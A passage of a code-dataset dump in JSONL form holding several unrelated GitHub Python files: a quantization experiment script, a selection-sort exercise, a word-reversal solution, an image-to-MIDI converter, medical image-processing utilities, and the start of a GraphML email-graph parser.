datasets:\n for method in quantizers:\n method.trainCodebooks(data, params)\n print(f'Codebooks for settings {data.prefix}{method.prefix}{params.prefix} are learned')\n\nif encodeDatasets:\n for params in paramSets:\n for data in datasets:\n for method in quantizers:\n method.encodeDataset(data, params)\n print(f'Dataset for settings {data.prefix}{method.prefix}{params.prefix} is encoded')\n\n# for params in paramSets:\n# for data in datasets:\n# for method in quantizers:\n# print (f'Settings: {data.prefix}{method.prefix}{params.prefix}')\n# print 
(f'Quantization error: {method.getQuantizationError(data, params)}')\n\n# for params in paramSets:\n# for data in datasets:\n# for method in quantizers:\n# neighborsCount = min(1024, data.basePointsCount)\n# result = method.searchNearestNeighbors(data, params, k=neighborsCount)\n\n# groundtruth = ivecs_read(data.groundtruthFilename)\n# print (f'Results: {data.prefix}{method.prefix}{params.prefix}')\n# T = [2**i for i in range(11)]\n# T.insert(5, 20)\n# for i in T:\n# print (f'Recall@{i} {getRecallAt(i, result, groundtruth)}')","repo_name":"z2liudake/Online-AQ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23651987679","text":"#Nombre: Jose Manuel Buendia Rodriguez\r\n#No. Control: 19011231\r\n#Calificacion\r\n\r\nlista = [5,7,3,1,8,4,9,2,6]\r\n\r\nlongitud = len(lista)\r\n\r\nfor i in range(longitud-1):\r\n print(lista)\r\n menor = i \r\n print(\"El indice actual para comprar es: \",menor)\r\n for j in range (i+1, longitud):\r\n if lista[j] < lista[menor]:\r\n menor = j\r\n print(\"Recorriendo lista, Es menor el indice \", menor )\r\n\r\n temporal = lista[menor]\r\n lista[menor] = lista[i]\r\n lista[i] = temporal\r\n print(\"Cambiamos el elemento \", lista[menor], \"por el elemento\", lista[i])","repo_name":"miguelinux/O2022-ayda","sub_path":"1025/seleccion/OrdenamientoSeleccion.py","file_name":"OrdenamientoSeleccion.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24232497795","text":"'''\n思路:\n 首先分隔字符串\n 再将每个单词进行反转\n 反转可以使用reverse 或者切片\n'''\ndef reverseWords(s):\n l=s.split()\n for i in range(len(l)):\n s=l[i]\n l[i]=s[::-1]\n return ' '.join(l)\n\ns=\"Let's take LeetCode contest\"\nprint(reverseWords(s))","repo_name":"liucheng2912/py","sub_path":"leecode/easy/219/557.py","file_name":"557.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30135745828","text":"from .hilbert_curve import *\nfrom midiutil.MidiFile import MIDIFile\nfrom PIL import Image\nfrom .median_color_quantifier import *\nfrom django.core.files.temp import NamedTemporaryFile\nfrom wsgiref.util import FileWrapper\nfrom tempfile import TemporaryFile\nfrom django.http import FileResponse\n\n\n# Testing stuff with specific colors to specific notes\ntest_palette = [(174,0,0),(255,0,0),(255,0,0),(255,102,0),(255,239,0),\n (153,255,0),(40,255,0),(0,255,242),(0,122,255),(5,0,255),\n (71,0,237),(99,0,178) ]\nrespective_notes = [66,67,68,69,70,71,72,73,74,75,76,77]\n\ndef lengthen_scale_octave(scale):\n returnScale = scale\n for i in range(len(scale)):\n returnScale.append(scale[i] + 8)\n return returnScale\n\ndef image_to_audio(imageBinary, input_scale,palette_size):\n \"\"\"\n Outputs a MIDI file that is a piano interpretation of an image\n\n :param imageBinary: Binary image data\\n\n :param input_scale: Desired musical scale (in the form of list of MIDI note values)\\n\n :param palette_size: Number of unique colors the image will be compressed to (must be power of 2)\\n\n :return: MIDI binary file\n \"\"\"\n #double_amount = int(math.log(palette_size,2)-3)\n scale = input_scale\n #for i in range(double_amount):\n #scale = lengthen_scale_octave(scale);\n # Open the image data\n im = Image.open(imageBinary)\n pix = im.load()\n color_palette = color_quantify(palette_size,im) # 
Simplify the image's number of colors to the palette size\n color_palette.sort(key=lambda tup: (tup[0]+tup[1]+tup[2])) # Sort the colors from darkest to brightest (will map the darker colors to lower scale notes)\n m = im.size[0]\n mf = MIDIFile(1)\n \n track = 0\n time = 0\n channel = 0\n volume = 100\n time = 0\n duration = 1\n \n mf.addTrackName(track,time,'ImageSong')\n mf.addTempo(track,time,120)\n \n \n numOfSkipPixels = 1\n i = 0\n while i < m**2:\n numOfSkipPixels = 1\n duration = 0.5\n timeIncrement = 0.5\n coordinate = d2xy(m,i)\n rgbVal = pix[coordinate[0],coordinate[1]]\n note = color_palette.index(closest_color(color_palette,rgbVal)) \n \n #note = test_palette.index(closest_color(test_palette,rgbVal)) #This is testing with specific colors to notes\n for j in range(i+1,m**2):\n coordinate2 = d2xy(m,j)\n rgbVal2 = pix[coordinate2[0],coordinate2[1]]\n \n note2 = color_palette.index(closest_color(color_palette,rgbVal2)) \n \n #note2 = test_palette.index(closest_color(test_palette,rgbVal2)) #This is testing with specific colors to notes\n \n if (note2 == note):\n duration += 0.5\n timeIncrement += 0.5\n numOfSkipPixels += 1\n else:\n break\n \n mf.addNote(track, channel, scale[note], time, duration, volume)\n time += timeIncrement\n\n i += numOfSkipPixels\n\n return mf\n\n # write it to disk\n #mf.writeFile(temp)\n #with open(\"C:\\\\Users\\\\Kenny\\\\Desktop\\\\aye.mid\", 'wb') as outf:\n #mf.writeFile(outf)\n\n","repo_name":"kmdiogo/SynOpticWebsite","sub_path":"SynOptic_Website/AudioizationScripts/image_to_sound.py","file_name":"image_to_sound.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23232595264","text":"\ncount = 0\nbest_score = 0\nbest_movie = \"\"\n\nwhile True:\n movie_name = input()\n count += 1\n ascii = 0\n if movie_name == \"STOP\":\n break\n if count == 7:\n print(\"The limit is reached.\")\n break\n for i in movie_name:\n if ord(i) in range(ord(\"A\"), ord(\"Z\") + 1):\n ascii += ord(i) - len(movie_name)\n elif ord(i) in range(ord(\"a\"), ord(\"z\") + 1):\n ascii += ord(i) - ( 2 *len(movie_name))\n else:\n ascii += ord(i)\n if ascii > best_score:\n best_score = ascii\n best_movie = movie_name\nprint(F\"The best movie for you is {best_movie} with {best_score} ASCII sum.\")\n\n\n","repo_name":"Nedelchev86/Python-Basic-SoftUni","sub_path":"Online_Exam_15_and_16_June_2019/06_Favorite_Movie.py","file_name":"06_Favorite_Movie.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29644164430","text":"import numpy as np \nimport cv2\nfrom skimage.exposure import rescale_intensity as rescale_int\nimport matplotlib.cm as cm\nimport SimpleITK as sitk\n\n\"\"\"Different image utils.\"\"\"\n\n__author__ = 'Ken C. L. 
Wong'\n\n\ndef get_pad_crop_bound(size):\n \"\"\"Gets the padding or cropping bounds using the max of the input (padding) or output (cropping) size.\"\"\"\n max_size = np.max(size)\n lb = []\n ub = []\n for sz in size:\n diff = int(max_size - sz)\n lb.append(diff // 2) # integer division: SimpleITK pad/crop bounds must be ints\n ub.append(diff - diff // 2)\n return lb, ub\n\n\ndef pad_resize(image, output_size, hw_only=False, interpolator=sitk.sitkNearestNeighbor, make_copy=True):\n \"\"\"Resizes an image and pads it to a square or cubic image if required.\n\n :param image: numpy array (hw, dhw, hwc, or dhwc) or SimpleITK Image (xy or xyz).\n :param output_size: output size, (height, width) or (depth, height, width).\n :param hw_only: if True, only zero-pad the height and width. 3D image only.\n :param interpolator: SimpleITK interpolator. E.g. sitk.sitkNearestNeighbor, sitk.sitkLinear.\n :param make_copy: if True, a copy of the image is returned if there is no modification.\n :return: Resized image.\n \"\"\"\n if len(output_size) == 2:\n hw_only = False\n\n original_image = image\n\n # Remember image type for numpy array\n image_type = None\n if not isinstance(image, sitk.Image):\n image_type = image.dtype\n\n # Get input size in xy or xyz\n if isinstance(image, sitk.Image):\n input_size = image.GetSize()\n else:\n input_size = image.shape[::-1]\n if image.ndim == len(output_size) + 1:\n input_size = input_size[1:]\n\n # Get output size in xy or xyz\n output_size = output_size[::-1]\n\n # Pad square or cube if necessary\n # Same size for all directions (2D, 3D)\n if np.unique(output_size).size == 1 and np.unique(input_size).size != 1 and not hw_only:\n lb, ub = get_pad_crop_bound(input_size)\n image = pad_or_crop(sitk.ConstantPad, image, lb, ub)\n # Same size for height and width only (3D)\n elif np.unique(output_size[:2]).size == 1 and np.unique(input_size[:2]).size != 1:\n lb, ub = get_pad_crop_bound(input_size[:2])\n image = pad_or_crop(sitk.ConstantPad, image, lb + [0], ub + [0])\n\n # Resize\n if not all(input_size[i] == output_size[i] for i in range(len(output_size))):\n image = resize(image=image, output_size=output_size[::-1], interpolator=interpolator)\n\n # Restore type\n if image_type is not None:\n image = get_array(image)\n image = np.asarray(image, dtype=image_type)\n\n # Make a copy if no change\n if original_image is image and make_copy:\n if isinstance(image, sitk.Image):\n image = sitk.Cast(image, image.GetPixelID())\n else:\n image = image.copy()\n\n return image\n\n\ndef pad_or_crop(ops, image, lb, ub):\n \"\"\"Pads or crops an image.\n\n :param ops: operation, sitk.ConstantPad or sitk.Crop.\n :param image: input image. Can be numpy array or SimpleITK Image.\n :param lb: padding lower bound.\n :param ub: padding upper bound.\n :return: padded image (SimpleITK Image).\n \"\"\"\n # Single-channel\n if (isinstance(image, sitk.Image) and image.GetNumberOfComponentsPerPixel() == 1) or image.ndim == len(lb):\n image = get_sitk_image(image)\n image = ops(image, lb, ub)\n # Multi-channel\n else:\n image = get_array(image)\n image = np.moveaxis(image, -1, 0)\n image_channels = [ops(get_sitk_image(img), lb, ub) for img in image]\n image = sitk.Compose(image_channels)\n\n return image\n\n\ndef reverse_pad_resize(image, output_size, hw_only=False, interpolator=sitk.sitkNearestNeighbor):\n \"\"\"Reverses the process of pad_resize and returns the original sized image. 
This function is useful for resizing\n the CNN output mask to fit the original image.\n\n :param image: numpy array (hw, dhw, hwc or dhwc) or SimpleITK Image (xy or xyz).\n :param output_size: output size, (height, width) or (depth, height, width), usually the shape of the original\n image before pad_resize.\n :param hw_only: if True, only crop the height and width. Needs to be consistent with pad_resize.\n :param interpolator: SimpleITK interpolator. E.g. sitk.sitkNearestNeighbor, sitk.sitkLinear.\n :return the resized image with output_size.\n \"\"\"\n if len(output_size) == 2:\n hw_only = False\n\n original_image = image\n\n # Remember image type for numpy array\n image_type = None\n if not isinstance(image, sitk.Image):\n image_type = image.dtype\n\n # Get input size in xy or xyz\n if isinstance(image, sitk.Image):\n input_size = image.GetSize()\n else:\n input_size = image.shape[::-1]\n if image.ndim == len(output_size) + 1:\n input_size = input_size[1:]\n\n # Get output size in xy or xyz\n output_size = output_size[::-1]\n\n # Resize and crop\n # Same size for all directions (2D, 3D)\n if np.unique(input_size).size == 1 and np.unique(output_size).size != 1 and not hw_only:\n size = np.ones(len(output_size)) * np.max(output_size)\n image = resize(image=image, output_size=size, interpolator=interpolator)\n lb, ub = get_pad_crop_bound(output_size)\n image = pad_or_crop(sitk.Crop, image, lb, ub)\n # Same size for height and width only (3D)\n elif np.unique(input_size[:2]).size == 1 and np.unique(output_size[:2]).size != 1:\n xy = output_size[:2]\n size = [output_size[2]] + list(np.ones(len(xy)) * np.max(xy)) # dhw\n image = resize(image=image, output_size=size, interpolator=interpolator)\n lb, ub = get_pad_crop_bound(xy)\n image = pad_or_crop(sitk.Crop, image, lb + [0], ub + [0])\n # Resize only\n else:\n image = resize(image=image, output_size=output_size[::-1], interpolator=interpolator)\n\n # Restore type\n if image_type is not None:\n image = get_array(image)\n image = np.asarray(image, dtype=image_type)\n\n # Make a copy if no change\n if original_image is image:\n if isinstance(image, sitk.Image):\n image = sitk.Cast(image, image.GetPixelID())\n else:\n image = image.copy()\n\n return image\n\n\ndef resize_by_spacing(image, input_spacing=None, interpolator=sitk.sitkNearestNeighbor):\n \"\"\"Resizes an image to isotropic spacing.\n\n The smallest spacing is used. This is useful as the image may be abnormally deformed when spacing information is\n discarded.\n\n :param image: numpy array (hw or dhw) or SimpleITK Image (xy or xyz).\n :param input_spacing: input image spacing, (height, width) or (depth, height, width).\n :param interpolator: SimpleITK interpolator. E.g. 
sitk.sitkNearestNeighbor, sitk.sitkLinear.\n :return: Resized image.\n \"\"\"\n if input_spacing is None:\n if isinstance(image, sitk.Image):\n input_spacing = image.GetSpacing()\n else:\n raise Exception('Input spacing must be provided for non-SimpleITK images.')\n\n # The smallest spacing is used\n output_spacing = np.ones(len(input_spacing)) * np.min(input_spacing)\n\n return resize(image=image, output_spacing=output_spacing, interpolator=interpolator)\n\n\ndef resize(image, output_size=None, output_spacing=None, interpolator=sitk.sitkNearestNeighbor):\n \"\"\"Resizes an image by the given output size and/or output spacing.\n\n :param image: numpy array (hw or dhw) or SimpleITK Image (xy or xyz).\n :param output_size: output size, (height, width) or (depth, height, width).\n :param output_spacing: output spacing, (height, width) or (depth, height, width).\n :param interpolator: SimpleITK interpolator. E.g. sitk.sitkNearestNeighbor, sitk.sitkLinear.\n :return: Resized image.\n \"\"\"\n if output_size is None and output_spacing is None:\n raise Exception('Both output_size and output_spacing are None.')\n\n image_type = None\n if not isinstance(image, sitk.Image):\n\n # Check if vector image\n if output_size is not None:\n target_dim = len(output_size)\n else:\n target_dim = len(output_spacing)\n isVector = False\n if image.ndim == target_dim + 1:\n isVector = True\n\n image_type = image.dtype # Remember the original type which may be changed during operations\n image = get_sitk_image(image, isVector=isVector)\n\n input_spacing = np.asarray(image.GetSpacing())\n input_size = np.asarray(image.GetSize())\n physical_size = input_spacing * input_size\n\n # Change to SimpleITK format, xy or xyz\n if output_size is not None:\n output_size = np.asarray(output_size)[::-1]\n if output_spacing is not None:\n output_spacing = np.asarray(output_spacing)[::-1]\n\n # Compute missing arguments assuming same physical size\n if output_spacing is None:\n output_spacing = physical_size / output_size\n elif output_size is None:\n output_size = physical_size / output_spacing\n\n resample = sitk.ResampleImageFilter()\n resample.SetInterpolator(interpolator)\n resample.SetSize(np.asarray(output_size, int))\n resample.SetOutputSpacing(output_spacing)\n resample.SetOutputOrigin(image.GetOrigin())\n image = resample.Execute(image)\n\n if image_type is not None:\n image = get_array(image)\n image = np.asarray(image, dtype=image_type)\n\n return image\n\n\ndef get_sitk_image(image, isVector=False):\n \"\"\"Converts to a SimpleITK Image if necessary.\n\n :param image: numpy array (hw or dhw) or SimpleITK Image (xy or xyz).\n :param isVector: if True, the last dimension is treated as the component (channel) axis.\n :return: SimpleITK Image.\n \"\"\"\n if not isinstance(image, sitk.Image):\n image = sitk.GetImageFromArray(image, isVector=isVector) # Transposing is taken care of by SimpleITK\n return image\n\n\ndef get_array(image):\n \"\"\"Converts to a numpy array if necessary.\n\n :param image: numpy array (hw or dhw) or SimpleITK Image (xy or xyz).\n :return: numpy array.\n \"\"\"\n if isinstance(image, sitk.Image):\n image = sitk.GetArrayFromImage(image) # Transposing is taken care of by SimpleITK\n return image\n
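\n\n# Illustrative usage (assumed shapes): resample a (64, 256, 256) dhw volume to\n# isotropic spacing, then to a fixed grid:\n# iso = resize_by_spacing(volume, input_spacing=(2.0, 1.0, 1.0), interpolator=sitk.sitkLinear)\n# out = resize(iso, output_size=(64, 128, 128), interpolator=sitk.sitkLinear)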
sitk.sitkNearestNeighbor, sitk.sitkLinear.\n :return: modified image.\n \"\"\"\n\n if image.ndim not in [3, 4]:\n raise Exception('Input image must be 2D or 3D with channels.')\n\n # Resize all channels\n input_channels = image.shape[-1]\n output_image = []\n for i in range(input_channels):\n output_image.append(resize(image=image[..., i], output_size=output_size, interpolator=interpolator))\n image = np.array(output_image) # channels_first\n\n # Modify channels if needed\n if channels == 1 and input_channels == 3:\n image = image.mean(axis=0, keepdims=True)\n elif channels == 3 and input_channels == 1:\n image = image.repeat(channels, axis=0)\n\n # Change to channels_last\n axes = list(range(image.ndim)) # list() is required in Python 3, where range objects cannot be concatenated\n axes = axes[1:] + axes[:1]\n image = image.transpose(axes)\n\n return image\n\n\ndef modify_size_channel_batch(image, output_size, channels, interpolator=sitk.sitkNearestNeighbor):\n \"\"\"Modifies image size and channels of an image batch.\n\n :param image: numpy array, channels_last, bhwc or bdhwc.\n :param output_size: output size, (height, width) or (depth, height, width).\n :param channels: output channels (1 or 3).\n :param interpolator: SimpleITK interpolator. E.g. sitk.sitkNearestNeighbor, sitk.sitkLinear.\n :return: modified image batch.\n \"\"\"\n assert image.ndim in [4, 5]\n output_image = []\n for img in image:\n output_image.append(\n modify_size_channel(image=img, output_size=output_size, channels=channels, interpolator=interpolator))\n image = np.array(output_image)\n\n return image\n\n\ndef bound_by_labels(labels, scale=1.0, pad_square=True):\n \"\"\"\n Gets a bounding box from a label image.\n\n :param labels: grey-level label image.\n :param scale: isotropic scaling of the bounding box.\n :param pad_square: True if padding the shorter side of the bounding box.\n\n :return: the bounding box with shape (2, 2). The first index is for the dimension (h, w), and the second index is\n for the lower and upper bounds (lb, ub). Cropping with the bounding box can be performed as: cropped = image[\n bound[0][0]:bound[0][1], bound[1][0]:bound[1][1]]\n \"\"\"\n\n # Get bounding box. [-2] selects the contours for both OpenCV 3 (3 return values) and OpenCV 4 (2 return values).\n contours = cv2.findContours(labels.astype(np.uint8), mode=cv2.RETR_LIST, method=cv2.CHAIN_APPROX_SIMPLE)[-2]\n points = np.concatenate(contours)\n bound = cv2.boundingRect(points) # [x, y, w, h]\n\n # Convert format\n sz = np.array([bound[3], bound[2]])\n bound = np.array([[bound[1], bound[1]+bound[3]],\n [bound[0], bound[0]+bound[2]]])\n\n # Rescale\n if scale != 1.0:\n for i in range(2):\n diff = (scale-1) * 0.5 * sz[i]\n bound[i][0] -= diff # lower bound\n bound[i][1] += diff # upper bound\n bound = bound.astype(int) # np.int was removed from recent NumPy\n\n # Pad square\n sz = bound[:, 1] - bound[:, 0]\n if pad_square and sz[0] != sz[1]:\n diff = sz.max() - sz.min()\n idx = sz.argmin()\n bound[idx][0] -= diff // 2 # integer split so the total expansion equals diff\n bound[idx][1] += diff // 2 + diff % 2\n\n # Correct index\n for i in range(2):\n bound[i][0] = bound[i][0] if bound[i][0] >= 0 else 0\n bound[i][1] = bound[i][1] if bound[i][1] <= labels.shape[i] else labels.shape[i]\n\n return bound\n\n\ndef windowing(image, window_center, window_width):\n \"\"\"Performs windowing on an image.\n\n :param numpy.array image: grey-level image.\n :param int/list/array window_center: for a scalar, it is used as the window center. For a list or array,\n its length must be a multiple of two to represent pairs of possible ranges. A random number generated between a\n pair is used as the window center. 
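For example, window_center=[35, 45, 300, 400] describes two candidate ranges, (35, 45) and (300, 400), and one pair is chosen at random. 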
The pair used is the same as that of window_width if it is also a list or array.\n :param int/list/array window_width: for a scalar, it is used as the window width. For a list or array,\n its length must be a multiple of two to represent pairs of possible ranges. A random number generated between a\n pair is used as the window width. The pair used is the same as that of window_center if it is also a list or array.\n :return: windowed image\n\n window_center and window_width must have the same length if both are not scalar.\n \"\"\"\n\n idx = None # Index to both window_center and window_width\n\n if np.isscalar(window_center):\n center = window_center\n else:\n if len(window_center) % 2 != 0:\n raise Exception('window_center must be a scalar or a list with even number of elements.')\n if idx is None:\n idx = np.random.choice(len(window_center) // 2) * 2 # integer division: np.random.choice requires an int\n center = np.random.uniform(window_center[idx], window_center[idx+1])\n\n if np.isscalar(window_width):\n width = window_width\n else:\n if len(window_width) % 2 != 0:\n raise Exception('window_width must be a scalar or a list with even number of elements.')\n if idx is None:\n idx = np.random.choice(len(window_width) // 2) * 2\n width = np.random.uniform(window_width[idx], window_width[idx+1])\n\n input_min = center - 0.5*width\n input_max = center + 0.5*width\n return rescale_int(image, in_range=(input_min, input_max), out_range=(0, 255))\n\n\nclass IntensityRescaleType(object):\n \"\"\"Defining the enum for image intensity rescaling.\"\"\"\n WINDOW = 0\n CLAHE = 1\n\n\ndef rescale_intensity(image, rescale_types, window_center=None, window_width=None):\n \"\"\" Based on the given rescale_types, performs image intensity rescaling such as windowing and histogram equalization.\n\n :param image: numpy array (hw or dhw).\n :param rescale_types: a list of IntensityRescaleType values indicating which methods can be performed.\n :param int/list/array window_center: for a scalar, it is used as the window center. For a list or array,\n its length must be a multiple of two to represent pairs of possible ranges. A random number generated between a\n pair is used as the window center. The pair used is the same as that of window_width if it is also a list or array.\n :param int/list/array window_width: for a scalar, it is used as the window width. For a list or array,\n its length must be a multiple of two to represent pairs of possible ranges. A random number generated between a\n pair is used as the window width. The pair used is the same as that of window_center if it is also a list or array.\n :return: intensity-rescaled image (0-255).\n \"\"\"\n\n if not rescale_types:\n raise ValueError('rescale_types is empty')\n\n idx = np.random.choice(len(rescale_types))\n if rescale_types[idx] == IntensityRescaleType.WINDOW:\n if window_center is None or window_width is None:\n return cv2.normalize(image, dst=np.array([]), alpha=0, beta=255, norm_type=cv2.NORM_MINMAX,\n dtype=cv2.CV_8UC1)\n else:\n return windowing(image, window_center, window_width)\n elif rescale_types[idx] == IntensityRescaleType.CLAHE:\n return clahe(image, clip_limit=3.0)\n else:\n raise Exception('Unexpected type.')\n\n\ndef clahe(image, clip_limit=3.0, tile_size=None):\n \"\"\"CLAHE for 2D and 3D images. 
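CLAHE is Contrast Limited Adaptive Histogram Equalization, applied here with OpenCV's createCLAHE. 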
Slice-by-slice for 3D images.\n\n :param image: numpy array (hw or dhw).\n :param clip_limit: clip limit for CLAHE.\n :param tile_size: tile size for CLAHE.\n :return: image after CLAHE.\n \"\"\"\n\n # Rescale to 0-255\n image = cv2.normalize(image, dst=np.array([]), alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC1)\n\n # Perform CLAHE\n equalizer = cv2.createCLAHE(clipLimit=clip_limit, tileGridSize=tile_size)\n if image.ndim == 2: # hw\n image = equalizer.apply(image)\n elif image.ndim == 3: # dhw\n output_image = []\n for img in image: # Slice-by-slice\n output_image.append(equalizer.apply(img))\n image = np.array(output_image)\n else:\n raise Exception('Only 2D and 3D images are supported.')\n\n return image\n\n\ndef colormap_31():\n \"\"\"Gets a colormap that has 31 independent colors from label 1 to 31.\"\"\"\n cmap = np.concatenate([cm.tab20b_r(range(20)), cm.Set3_r(range(11))])\n return matplotlib_to_opencv_colormap(cmap)\n\n\ndef matplotlib_to_opencv_colormap(cmap, black_bg=True, unique_color=True):\n cmap = cmap * 255\n cmap = cmap[:, :3].astype(np.uint8)\n if unique_color:\n _, idx = np.unique(cmap, axis=0, return_index=True)\n cmap = cmap[np.sort(idx)]\n if black_bg:\n cmap = np.concatenate(([[0, 0, 0]], cmap))\n if len(cmap) < 256:\n cmap = np.concatenate((cmap, np.ones((256 - len(cmap), 3)) * 255))\n cmap = np.fliplr(cmap)\n cmap = np.array([cmap])\n return cmap\n\n\ndef map_label(label, cmap=colormap_31()):\n \"\"\"Maps label to a given colormap.\n\n :param label: label.\n :param numpy.array cmap: colormap for mapping the label.\n :return: label with mapped color.\n \"\"\"\n\n label = cv2.cvtColor(label.astype(np.uint8), cv2.COLOR_GRAY2RGB)\n return cv2.LUT(label, cmap).astype(np.uint8)\n\n\ndef label_overlay(image, label, image_alpha=0.5, label_alpha=0.5, cmap=colormap_31()):\n \"\"\"Overlays label on image.\n\n :param numpy.array image: image.\n :param numpy.array label: label.\n :param float image_alpha: controls transparency of image.\n :param float label_alpha: controls transparency of label.\n :param numpy.array cmap: colormap for mapping the label.\n :return: image overlaid with label, and the label with mapped color.\n \"\"\"\n\n image = cv2.normalize(image, dst=np.array([]), alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC1)\n image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n label_new = map_label(label, cmap)\n\n return cv2.addWeighted(image, image_alpha, label_new, label_alpha, 0), label_new\n\n\ndef slice_padding(image, num_slices, padding='zero'):\n \"\"\"Slice padding for multi-instance learning.\n\n :param numpy.array image: input image.\n :param int num_slices: number of target slices.\n :param str padding: padding method. 'zero', 'repeat', or 'linear'.\n :return: padded image.\n :rtype: numpy.array\n \"\"\"\n\n padding_allowed = {'zero', 'repeat', 'linear'}\n if padding not in padding_allowed:\n raise ValueError('The `padding` argument must be one of \"zero\", \"repeat\", \"linear\". Received: ' + str(padding))\n\n num_slices = int(num_slices) # Ensure integer\n image_padded = image\n\n len_image = len(image)\n\n if padding == 'repeat':\n\n mid_slice = int(len_image * 0.5)\n\n # Padding. Padding slices are from the middle part of the image. 
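For example, padding a 4-slice image to 6 slices appends copies of the two middle slices. 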
Looping is used as the extra slices required\n # can be larger than the entire image, though this should seldom happen.\n while num_slices != len(image_padded):\n extra_slices = num_slices - len(image_padded)\n\n start_idx = mid_slice - extra_slices // 2 # integer arithmetic so the indices below are ints in Python 3\n start_idx = 0 if start_idx < 0 else start_idx\n\n end_idx = mid_slice + extra_slices // 2 + extra_slices % 2\n end_idx = len_image if end_idx > len_image else end_idx\n\n pad = image[start_idx:end_idx]\n image_padded = np.concatenate([image_padded, pad])\n\n elif padding == 'zero':\n\n pad = np.zeros((num_slices - len_image,) + image_padded.shape[1:], dtype=image_padded.dtype)\n image_padded = np.concatenate([image_padded, pad])\n\n elif padding == 'linear':\n\n image_shape = image_padded.shape\n axis = np.argmin(image_shape) # Channel axis\n assert image_shape[axis] == 1, 'Slice interpolation only works for gray-level images.'\n\n # Remove channel --> z, y, x.\n image_padded = image_padded[:, 0, ...] if axis == 1 else image_padded[..., 0]\n\n # Interpolation using SimpleITK\n image_sitk = sitk.GetImageFromArray(image_padded) # Transpose is taken care of by SimpleITK\n spacing = np.asarray(image_sitk.GetSpacing())\n spacing[2] *= len_image / float(num_slices)\n size = np.asarray(image_sitk.GetSize())\n size[2] = num_slices\n resample = sitk.ResampleImageFilter()\n resample.SetSize([int(s) for s in size]) # plain Python ints for SimpleITK\n resample.SetOutputSpacing([float(s) for s in spacing])\n resample.SetOutputOrigin(image_sitk.GetOrigin())\n image_sitk = resample.Execute(image_sitk)\n\n # Restore format\n image_padded = sitk.GetArrayFromImage(image_sitk) # Transpose is taken care of by SimpleITK\n image_padded = np.expand_dims(image_padded, axis=axis)\n\n return image_padded\n","repo_name":"CS527Applied-Machine-Learning-for-Games/Team-Scrubs","sub_path":"PythonFiles/ML code/scripts/utils/imageutils.py","file_name":"imageutils.py","file_ext":"py","file_size_in_byte":22845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35393001085","text":"import re\nimport SETTINGS\n\nfrom Message import Message\nfrom EmailAddress import EmailAddress\nfrom Person import Person\nfrom Edge import Edge\n\ndef extract_data(tree):\n GRAPH = \"{http://graphml.graphdrawing.org/xmlns}graph\"\n NODE = \"{http://graphml.graphdrawing.org/xmlns}node\"\n EDGE = \"{http://graphml.graphdrawing.org/xmlns}edge\"\n DATA = \"{http://graphml.graphdrawing.org/xmlns}data\"\n\n email_address_nodes = {}\n message_nodes = {}\n person_nodes = {}\n edges = {}\n \n # 'graphml' level\n root = tree.getroot()\n\n # 'graph' level\n for element in root:\n if element.tag == GRAPH:\n \n # 'node' and 'edge' level\n for node in element:\n if node.tag == NODE:\n node_id = node.get('id')\n epoch_secs = body = email_id = subject = datetime = None\n address = fully_observed = lastname = firstname = provenance = None # initialise so missing keys do not raise a NameError\n for data in node.findall(DATA):\n\n # Email Address related fields\n if data.get('key') == 'address':\n address = data.text\n elif data.get('key') == 'fullyObserved':\n fully_observed = data.text\n \n # Message related fields\n elif data.get('key') == 'datetime':\n datetime = data.text \n elif data.get('key') == 'epochSecs':\n epoch_secs = data.text\n elif data.get('key') == 'subject':\n# subject = clean_data(data.text)\n subject = data.text \n elif data.get('key') == 'body':\n# body = clean_data(data.text)\n body = data.text\n elif data.get('key') == 'emailID':\n email_id = data.text\n \n # Person related fields\n elif data.get('key') == 'lastName':\n lastname = data.text\n elif data.get('key') == 'firstName':\n firstname = data.text\n elif data.get('key') 
== 'provenance':\n provenance = data.text\n \n # Checking the node type\n for data in node.findall(DATA):\n if data.get('key') == 'type' and data.text == 'Email Address':\n email_new_node = EmailAddress(node_id, address, fully_observed)\n\n # Saving into dictionary with node_id as key\n email_address_nodes[email_new_node._node_id] = email_new_node\n elif data.get('key') == 'type' and data.text == 'Message':\n message_new_node = Message(node_id, datetime, epoch_secs, subject, body, email_id)\n\n # Saving into dictionary with node_id as key\n message_nodes[message_new_node._node_id] = message_new_node\n elif data.get('key') == 'type' and data.text == 'Person':\n person_new_node = Person(node_id, lastname, firstname, provenance)\n\n # Saving into dictionary with node_id as key\n person_nodes[person_new_node._node_id] = person_new_node \n\n elif node.tag == EDGE:\n edge_id = node.get('id')\n edge_source = node.get('source')\n edge_target = node.get('target')\n edge_label = node.get('label')\n \n epoch_secs = order = datetime = edge_type = start_datetime = end_datetime = evidence_type = None\n for data in node.findall(DATA):\n if data.get('key') == 'epochSecs':\n epoch_secs = data.text\n elif data.get('key') == 'order':\n order = data.text\n elif data.get('key') == 'datetime':\n datetime = data.text\n elif data.get('key') == 'type':\n edge_type = data.text\n elif data.get('key') == 'startDatetime':\n start_datetime = data.text\n elif data.get('key') == 'endDatetime':\n end_datetime = data.text\n elif data.get('key') == 'evidenceType':\n evidence_type = data.text \n \n \n new_edge = Edge(edge_id, edge_source, edge_target, edge_label, epoch_secs, order, datetime, edge_type, start_datetime, end_datetime, evidence_type)\n edges[new_edge._edge_id] = new_edge\n \n return message_nodes, email_address_nodes, person_nodes, edges\n\n\ndef clean_data(text):\n # Removing special characters\n text = re.sub(\"[\\n\\t\\-\\*\\+\\$\\\"\\\\\\(\\)\\_\\=]+\", \" \", text)\n \n # Removing tags\n text = re.sub('(<[^<]+>|<<[^<<]+>>)', \"\", text)\n text = re.sub(\"<<\", \" \", text)\n text = re.sub(\">>\", \" \", 